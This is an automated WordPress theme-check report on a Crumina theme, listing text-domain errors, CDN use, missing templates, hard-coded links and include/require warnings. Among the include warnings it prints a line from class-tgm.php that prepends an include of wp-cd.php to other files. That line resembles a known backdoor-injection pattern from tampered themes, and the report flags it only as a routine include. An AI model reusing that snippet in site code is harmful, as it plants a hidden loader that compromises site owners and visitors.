  4. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function _e, with the arguments "crum" in file mvb_recent_works_desc.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Member additional', mvb, 'mvb' in file mvb_our_team.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Customize &#8220;%s&#8221;' in file options.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Current theme preview' in file options.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Current theme preview' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'By %s' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Version %s' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'This <a href="%1$s">child theme</a> requires its parent theme, %2$s.' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'http://codex.wordpress.org/Child_Themes' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Display Custom Excerpt ' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'If enabled custom excerpt will be displayed under portfolio featured images on portfolio Grid pages' in file options.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'If you like <strong>Redux</strong> please leave us a <a href="', https://, 'wordpress.org/support/view/plugin-reviews/redux-framework?filter=5#postform" target="_blank" class="redux-rating-link" data-rated="Thanks :)">&#9733;&#9733;&#9733;&#9733;&#9733;</a> rating. A huge thank you from Redux in advance!' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'If you like <strong>Redux</strong> please leave us a <a href="', https://, 'wordpress.org/support/view/plugin-reviews/redux-framework?filter=5#postform" target="_blank" class="redux-rating-link" data-rated="Thanks :)">&#9733;&#9733;&#9733;&#9733;&#9733;</a> rating. A huge thank you from Redux in advance!', 'redux-framework' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Thank you for your message!', </h2>, 'crum' in file page-contacts.php.Found a translation function that is missing a text-domain. Function _e, with the arguments '*' in file comments.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'crum' in file widgets.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'crum' in file widget-vcard.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Clear' in file init.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Default' in file init.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Select Color' in file init.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Current Color' in file init.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Save' in file init.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are crum, mvb, redux-framework, themecheck, https://, buddypress, reactor, </h2>, woocommerce, product_cat, product_tag, roots, gallery, cmb.
  5. Cdn : Use of CDNFound the URL of a CDN in the code: html5shiv.googlecode.com/svn/trunk/html5.js. CSS or Javascript resources should not be loaded from a CDN. These resources should be bundled with the theme.
  6. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  7. PHP short tags : Presence of PHP short tagsPHP short tags were found in file parsedown.php. "This practice is discouraged because they are only available if enabled with short_open_tag php.ini configuration file directive, or if PHP was configured with the --enable-short-tags option" (php.net), which is not the case on many servers.
    Line 14: # Modified by Dovy Paukstys to remove <? shortcode-like declaration.
  8. Fundamental theme elements : Presence of comment_form()Could not find comment_form.
  9. Comment pagination : Declaration of comment paginationThe theme doesn't have comment pagination code in it. Use paginate_comments_links() to add comment pagination, or older previous_comments_link() and next_comments_link() functions.
  10. Comment reply : Declaration of comment replyCould not find the comment-reply script enqueued, however a reference to 'comment-reply' was found. Make sure that the comment-reply js script is being enqueued properly on singular pages.
  11. Featured image : Use of the_post_thumbnail() instead of custom fields for thumbnailsNo reference to the_post_thumbnail was found in the theme.
  12. CSS files : Presence of .screen-reader-text class.screen-reader-text css class is needed in your theme css. See : the Codex for an example implementation.
  13. Screenshot : Screenshot fileScreenshot size is 300x225px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon managementPossible Favicon found in header.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file options.php.
    Line 268: <p>If you have some questions on the theme, you can send them to our PM on <a href='http://themeforest.net/user/Crumina '>Themeforest.net</a>, you can send us 
    Line 349: 'sub_desc' => __('<p>After change please go to <a href='options-permalink.php'>Settings -> Permalinks</a> and press 'Save changes' 
    Line 1524: 'desc' => __('<p class='description'>More information about api keys and how to get it you can find in that tutorial <a href='http://crumina.net/how-do-i-get-consumer-key-for-sign-in-with-twitter/'>htt
    Possible hard-coded links were found in the file widget-tweets.php.
    Line 75: echo '<strong>' . $tweets->errors[0]->message . '!</strong><br />You\'ll need to regenerate it <a href='https://dev.twitter.com/apps' target='_blank'>here</a>!' . $after_widget;
    Possible hard-coded links were found in the file column-shortcode.php.
    Line 5: * Description: A [column] shortcode plugin for the required+ Foundation parent theme and child themes, based on <a href='http://themehybrid.com/plugins/grid-columns'>GridColumns by Justin Tadlock<
    Line 277: * If you prefer the shortcode by http://themehybrid.com/plugins/grid-columns
    Possible hard-coded links were found in the file alertbox-shortcode.php.
    Line 5: * Description: An [alert] shortcode plugin for the required+ Foundation parent theme and child themes, see <a href='http://foundation.zurb.com/docs/elements.php'>Foundation Docs</a> for more 
    Possible hard-coded links were found in the file class.SidebarGenerator.php.
    Line 247: You can create how many sidebars you want and then go and <a href='post-new.php?post_type=page'>Create</a> or <a href='edit.php?post_type=page
    Line 248: The sidebar will be added automaticaly to <a href='widgets.php'>Widgets</a> page
    Possible hard-coded links were found in the file project-social.php.
    Line 18: <a href='https://twitter.com/share' class='twitter-share-button' data-lang='en'>Twee
  3. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  4. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  5. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  6. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  7. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  8. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  9. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  10. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  11. Use of includes : Use of include or requireThe theme appears to use include or require : options.php
    Line 81: require_once(ABSPATH .'/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : framework.php
    Line 425: require_once 'core/dashboard.php';
    Line 428: require_once 'core/newsflash.php';
    Line 1701: require_once 'core/enqueue.php';
    Line 2845: require_once 'core/enqueue.php';
    Line 2903: require_once 'core/panel.php';
    Line 3232: require_once 'core/panel.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : extension_customizer.php
    Line 142: include_once( ReduxFramework::$_dir . 'core/enqueue.php' );
    Line 751: require_once( $class_file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : welcome.php
    Line 372: require_once 'views/about.php';
    Line 387: require_once 'views/changelog.php';
    Line 402: require_once 'views/extensions.php';
    Line 418: require_once 'views/support.php';
    Line 433: require_once 'views/credits.php';
    Line 448: require_once 'views/status_report.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : field_button_set.php
    Line 46: *              ['format']      string Formatting options for paginate fields. Options include ('currency','nice','niceShort','timeAgoInWords' or a valid Date() f
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : include-boxes.php
    Line 12: require_once 'page-boxes.php';
    Line 13: require_once 'post-boxes.php';
    Line 16: require_once 'headers-boxes.php';
    Line 19: require_once 'features-boxes.php';
    Line 20: require_once 'testimonial-boxes.php';
    Line 21: require_once 'portfolio-boxes.php';
    Line 22: require_once 'custom-sidebar.php';
    Line 23: require_once 'custom-menu.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : widgets.php
    Line 81: require( get_template_directory() . '/inc/widgets/widget-menu.php' );
    Line 83: require( get_template_directory() . '/inc/widgets/widget-tweets.php' );
    Line 84: require( get_template_directory() . '/inc/widgets/widget-tabs.php' );
    Line 85: require( get_template_directory() . '/inc/widgets/widget-tags.php' );
    Line 87: require( get_template_directory() . '/inc/widgets/widget-gallery.php' );
    Line 88: require( get_template_directory() . '/inc/widgets/widget-instagram.php' );
    Line 90: require( get_template_directory() . '/inc/widgets/widget-category-news.php'
    Line 91: require( get_template_directory() . '/inc/widgets/widget_categories.php' );
    Line 92: require( get_template_directory() . '/inc/widgets/widget-facebook.php' );
    Line 93: require( get_template_directory() . '/inc/widgets/widget-video.php' );
    Line 94: require( get_template_directory() . '/inc/widgets/widget-audio.php' );
    Line 95: require( get_template_directory() . '/inc/widgets/widget-flickr.php' );
    Line 96: require( get_template_directory() . '/inc/widgets/widget-vcard.php' );
    Line 97: require( get_template_directory() . '/inc/widgets/widget-styled-list.php' )
    Line 98: require( get_template_directory() . '/inc/widgets/widget-count.php' );
    Line 99: require( get_template_directory() . '/inc/widgets/widget-recent.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : icon-manager.php
    Line 512: include($file);
    Line 575: include($file);
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : init.php
    Line 220: @include( $file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : twitteroauth.php
    Line 10: require_once('OAuth.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : icons.php
    Line 119: include( $file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-tgm-plugin-activation.php
    Line 34: require_once ('class-tgm.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-tgm.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes